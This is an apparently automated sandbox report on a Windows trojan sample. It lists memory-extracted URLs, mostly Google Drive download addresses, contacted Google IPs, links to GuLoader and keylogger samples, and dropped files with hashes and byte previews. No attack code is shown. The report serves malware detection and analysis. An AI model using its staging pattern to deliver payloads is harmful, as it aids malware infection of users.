00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.ftp.ftp://ftp.gopher.Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                		high
                                https://drive.usercontent.google.com/Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.google.com/R.Calcifuge.exe, 00000006.00000003.2423875201.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.usercontent.google.com/P%Calcifuge.exe, 00000006.00000003.2228056370.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorLMSxhK1u8Z.exe, Calcifuge.exe.1.drfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/CCalcifuge.exe, 00000006.00000003.2674274316.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.google.com/Z.Calcifuge.exe, 00000006.00000003.2674274316.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.mipowershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.comCalcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com/JCalcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.mpowershell.exe, 00000001.00000002.1999999428.0000000008A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdCalcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                        		high
                                                        https://drive.google.com/ZCalcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.comTCalcifuge.exe, 00000006.00000003.2720820376.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://drive.google.com/Calcifuge.exe, 00000006.00000003.2514842468.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2779106940.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.google.com/ertificatesCalcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/j.Calcifuge.exe, 00000006.00000003.2148548358.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                          		high
                                                                          https://drive.usercontent.google.com/w&Calcifuge.exe, 00000006.00000003.2571402123.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.comZCalcifuge.exe, 00000006.00000003.2332167352.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdCalcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                              		high
                                                                              https://drive.usercontent.google.com/;Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://drive.google.com/2.Calcifuge.exe, 00000006.00000003.2171133228.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/r.Calcifuge.exe, 00000006.00000003.2880880177.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://apis.google.comCalcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKACalcifuge.exe, 00000006.00000003.2685599217.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://drive.google.com/_1Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://drive.google.com/ificateCalcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              172.217.16.206
                                                                                              		drive.google.comUnited States
                                                                                              		15169GOOGLEUSfalse
                                                                                              172.217.16.129
                                                                                              		drive.usercontent.google.comUnited States
                                                                                              		15169GOOGLEUSfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1588662
                                                                                              Start date and time:2025-01-11 03:50:55 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 24s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:8
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:LMSxhK1u8Z.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.evad.winEXE@6/15@2/2
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 33.3%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 87%
                                                                                              • Number of executed functions: 76
                                                                                              • Number of non-executed functions: 44
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target Calcifuge.exe, PID 7824 because there are no executed function
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7360 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              21:51:50API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                              21:52:31API Interceptor36x Sleep call for process: Calcifuge.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              No context

                                                                                              Domains

                                                                                              No context

                                                                                              ASNs

                                                                                              No context

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              37f463bf4616ecd445d4a1937da06e19ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129
                                                                                              Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 172.217.16.206
                                                                                              • 172.217.16.129

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):53158
                                                                                              Entropy (8bit):5.062687652912555
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                              C:\Users\user\AppData\Local\Temp\Calcifuge.exe

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):1048752
                                                                                              Entropy (8bit):7.5565849180901195
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:2j+EpTNHhl/G2yQhhdR/mwmNG3Ap137dboaPjyMi76KbP:S+OT5vG2y2hvXt3IRM+i76y
                                                                                              MD5:F2827F013A265DE94993C62BF9756B00
                                                                                              SHA1:9CC4CC403434E08C9C2E2AB312980CAD6B2470CA
                                                                                              SHA-256:FE05B02FDA8DC707CEB4143B4A2E4D6553D5410F226907CF0AE318B54EDF28B2
                                                                                              SHA-512:02AF8C436750DF4E9C36CE4E93D4F263563BBC6052693441B82CC2E970FAFCA557039FAE92CEE0493ECD28D433C7C8594433421CED08F033ED8FD317B12E090B
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@..........................@.......u...............................................P...............................................................................................................text....`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\Calcifuge.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1slkv0qr.ykm.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fh4uzbpw.ixu.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mltii0nf.0hv.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yiskquku.wxh.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Bverlamspelsen223.Dek

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):300402
                                                                                              Entropy (8bit):7.750350130002499
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:bv+b9bmrrv8K5/t6Zv2iJG10Vt1e3S9COPHivY7xjjL1h9WDKEUMu+nBN:bGbmD8K51B2GGb1iS7PHiv0RVoYL+BN
                                                                                              MD5:2FD0FD06BDBD0BEB53C441C78443B0FD
                                                                                              SHA1:AFE12625E85BC7E7CEBC5C5A7D5DB570E266A74C
                                                                                              SHA-256:5857C0C22F7CB938708A342BAC1F11D5F02AE07062A91CB2E47F7BD3A1CA8F2D
                                                                                              SHA-512:1C44D57A722272B0B020051C1CF0A0F0A16AFCC7B6FF8D822C150F046DAE4E2F3EF5E7471056E19E7265C8235F6B57BEEC4983887A2F26DF8E4C51F100A4020E
                                                                                              Malicious:false
                                                                                              Preview:..........................dd......GG....................................T.=.55555555.....)))..NN...........dddd........;................................U..t...........z...555.....B..s...................n............Z....LL..H...........[[....===. ............(((((...^........u.....~...................|.Y.r..a............SSSSSSSSSS.qqq....||||..........ii..+..;..............3.2.................^.......i.......................................****....b................MMMMMMM........./.B......................333...YY...........==.[[[...........ggggg..............##.rr......................II........................00................**......D.---............+.............u....+.........................................)))).....m....%%%...b............B..........+............g...?.................................::...eeee.........000........G......666....~...?...TT..................................CC........................................'.....cc........e..........^^....000..D.!!!!!!!!!..__.

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Detergenternes.bre

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
